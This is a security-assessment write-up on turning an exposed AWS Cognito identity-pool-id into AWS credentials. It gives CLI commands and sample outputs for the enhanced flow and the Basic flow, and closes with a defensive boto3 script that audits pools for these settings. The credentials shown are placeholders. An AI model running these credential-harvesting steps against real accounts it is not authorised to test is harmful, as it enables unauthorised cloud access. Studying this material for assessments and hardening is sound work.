Let’s assume you have obtained an AWS Cognito identity-pool-id during an assessment. Here we will see how that can be exploited to gain access to AWS credentials.
An identity-pool-id looks like: us-east-1:7fg66201-w7vw-715j-nhle-uw30mlst27a6
The following command can be used to get the IdentityId (the request is unsigned, since no AWS credentials are needed at this point):
aws cognito-identity get-id --identity-pool-id us-east-1:7fg66201-w7vw-715j-nhle-uw30mlst27a6 --no-sign-request
{
"IdentityId": "us-east-1:3a1b2d3c-4567-89ab-cd01-23456789abcd"
}
The following command can be used to get AWS credentials using the generated IdentityId:
aws cognito-identity get-credentials-for-identity --identity-id us-east-1:3a1b2d3c-4567-89ab-cd01-23456789abcd --no-sign-request
{
"IdentityId": "us-east-1:3a1b2d3c-4567-89ab-cd01-23456789abcd",
"Credentials": {
"AccessKeyId": "AKIAIOSFODNN7EXAMPLE",
"SecretKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
"SessionToken": "FwoGZXIvYXdzEItuEXAMPLESESSIONTOKEN...[REMOVED]",
"Expiration": 4892047561.0
}
}
These credentials can be used to authenticate to AWS, but they come from what Cognito calls the enhanced authentication flow, which yields a restrictive session: it only allows access to a limited set of services, even if the role itself has access to other services.
There is another flow called the Basic Authentication Flow. If the identity-pool-id has this flow enabled, we can get access to all the services available to the role. The following steps can be used for the Basic Authentication Flow.
The following command can be used to get the IdentityId:
aws cognito-identity get-id --identity-pool-id us-east-1:7fg66201-w7vw-715j-nhle-uw30mlst27a6 --no-sign-request
{
"IdentityId": "us-east-1:3a1b2d3c-4567-89ab-cd01-23456789abcd"
}
The following command can be used to get the OpenID token:
aws cognito-identity get-open-id-token --identity-id us-east-1:3a1b2d3c-4567-89ab-cd01-23456789abcd --no-sign-request
{
"IdentityId": "us-east-1:3a1b2d3c-4567-89ab-cd01-23456789abcd",
"Token": "eyKyrt...[REMOVED]"
}
Use the previously generated token to get IAM session credentials for the role that the identity pool maps to unauthenticated identities:
aws sts assume-role-with-web-identity --role-arn "arn:aws:iam::123456789012:role/test_role" --role-session-name sessionname --web-identity-token "eyKyrt...[REMOVED]"
{
"Credentials": {
"AccessKeyId": "AKIAIOSFODNN7EXAMPLE",
"SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
"SessionToken": "FwoGZXIvYXdzEItuEXAMPLESESSIONTOKEN...[REMOVED]",
"Expiration": "2025-02-02T12:42:19Z"
},
"SubjectFromWebIdentityToken": "us-east-1:3a1b2d3c-4567-89ab-cd01-23456789abcd",
"AssumedRoleUser": {
"AssumedRoleId": "AKIAIOSFODNN7EXAMPLE:sessionname",
"Arn": "arn:aws:sts::335963293212:assumed-role/test_role/sessionname"
},
"Provider": "cognito-identity.amazonaws.com",
"Audience": "us-east-1:3a1b2d3c-4567-89ab-cd01-23456789abcd"
}
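As an added, defender-side example that is not part of the original write-up: a boto3 audit that flags identity pools carrying the two settings these steps depend on, AllowUnauthenticatedIdentities (required for get-id to succeed without a login) and AllowClassicFlow (the Basic Authentication Flow above), together with the role granted to unauthenticated identities. The sample responses are constructed (they reuse the pool id and role name from the write-up; the pool name is a placeholder), and audit_region assumes boto3 plus credentials for the account being reviewed.

```python
"""Audit Cognito identity pools for the settings this write-up relies on."""
from typing import Dict, List

# Constructed sample responses (not from a real account); pool id and role name reuse the write-up's values.
SAMPLE_POOL = {
    "IdentityPoolId": "us-east-1:7fg66201-w7vw-715j-nhle-uw30mlst27a6",
    "IdentityPoolName": "example_pool",
    "AllowUnauthenticatedIdentities": True,
    "AllowClassicFlow": True,
}
SAMPLE_ROLES = {
    "IdentityPoolId": "us-east-1:7fg66201-w7vw-715j-nhle-uw30mlst27a6",
    "Roles": {
        "authenticated": "arn:aws:iam::123456789012:role/authenticated_role",
        "unauthenticated": "arn:aws:iam::123456789012:role/test_role",
    },
}

def assess_pool(pool: Dict, roles: Dict) -> List[str]:
    """Findings for one pool from DescribeIdentityPool and GetIdentityPoolRoles output."""
    findings = []
    if pool.get("AllowUnauthenticatedIdentities"):
        # GetId with no login map only succeeds when this is on: anyone holding the
        # pool id can mint an IdentityId and then credentials for the unauthenticated role.
        role = roles.get("Roles", {}).get("unauthenticated", "<none configured>")
        findings.append(f"unauthenticated identities enabled; role: {role}")
    if pool.get("AllowClassicFlow"):
        # Classic (basic) flow: GetOpenIdToken + AssumeRoleWithWebIdentity hands out the
        # role's full permissions instead of the enhanced flow's scoped-down session.
        findings.append("classic (basic) authentication flow enabled")
    return findings

def audit_region(region: str) -> Dict[str, List[str]]:
    """Run assess_pool over every identity pool in a region (needs boto3 and credentials)."""
    import boto3  # imported here so assess_pool stays usable offline
    client = boto3.client("cognito-identity", region_name=region)
    results, kwargs = {}, {"MaxResults": 60}
    while True:
        page = client.list_identity_pools(**kwargs)
        for pool in page["IdentityPools"]:
            pid = pool["IdentityPoolId"]
            results[pid] = assess_pool(client.describe_identity_pool(IdentityPoolId=pid),
                                       client.get_identity_pool_roles(IdentityPoolId=pid))
        if not page.get("NextToken"):
            return results
        kwargs["NextToken"] = page["NextToken"]

if __name__ == "__main__":
    print("\n".join(assess_pool(SAMPLE_POOL, SAMPLE_ROLES)))
```

A pool that reports both findings is the configuration the two flows above rely on; disabling unauthenticated identities, or at least the classic flow, removes the path to the role's full permissions.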